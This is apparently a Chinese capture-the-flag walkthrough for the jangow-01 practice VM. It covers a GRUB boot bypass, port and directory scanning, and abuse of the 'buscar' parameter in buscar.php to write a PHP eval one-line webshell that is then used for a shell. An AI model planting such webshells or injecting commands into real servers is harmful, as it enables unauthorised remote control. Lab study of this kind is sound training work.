当前位置: 首页 > article >正文

目录jangow-01-1.0.1靶机

靶机 ip:192.168.152.155

把靶机的网络模式调成和攻击机kali一样的网络模式,我的kali是NAT模式,

在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个,按回车。

继续选择第二个,这次按 e 进入编辑页面

接下来, 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"

按 F10 或者 ctrl+x 启动

我们 cd 到 etc 下的 network 目录中修改 interfaces 文件(将网卡信息设置为 ens33),重启靶机即可生效。)

cd etc
cd network
vim interfaces

第一步 信息收集

我们使用 nmap -sS 扫描端口

发现他开启了 80 和 21 端口

我们访问一下 80 端口

发现了一个 site 目录,点击进去是一个页面

我们继续使用 dirb 查一下他有什么文件

我们挨个访问一下,assets 是一个图片目录

css 是一个文件目录

访问到 buscar.php 中发现url 框中有参数 buscar=

我们输入一个 id 参数

页面有变化

这时我们就可以写入一个一句话木马

echo '<?php eval($_POST["cmd"]);' > 123.php

我们去访问一下 123.php

访问成功,使用蚁剑连接

获得 shell


http://www.kler.cn/a/453879.html

相关文章:

  • 线性代数行列式
  • Linux网络——TCP的运用
  • 【Three.js基础学习】33.Halftone Shading shaders
  • 五分钟学会如何在GitHub上自动化部署个人博客(hugo框架 + stack主题)
  • SQL创建和操纵表
  • 基于OpenCV和Python的人脸识别系统_django
  • Eclipse常用快捷键详解
  • 【3.1 以太网RDMA优化--网卡缓存资源维度】
  • Android--java实现手机亮度控制
  • react高阶组件及hooks
  • 透视网络世界:计算机网络习题的深度解析与总结【前3章】
  • 物联网乐鑫USB方案,设备互联和数据传输应用
  • Oracle 普通表至分区表的分区交换
  • chrome缓存机制以及验证缓存机制
  • springboot/ssm图书大厦图书管理系统Java代码编写web图书借阅项目
  • uniapp抖音小程序,如何一键获取用户手机号
  • ES学习module模块化(十二)
  • 新建一个springboot项目
  • 中关村科金智能客服机器人如何解决客户个性化需求与标准化服务之间的矛盾?
  • 深度学习实战103-基于KDD Cup 99数据集的搭建神经网络的检测系统(NIDS),通过对网络流量数据进行分析,提供完整代码
  • DALFox-一款XSS自动化扫描工具
  • GA-Kmeans-Transformer时序聚类+状态识别组合模型
  • vscode修改中文显示格式
  • transformer用作分类任务
  • Golang 的并发优势
  • 数据结构(哈希表(上)纯概念版)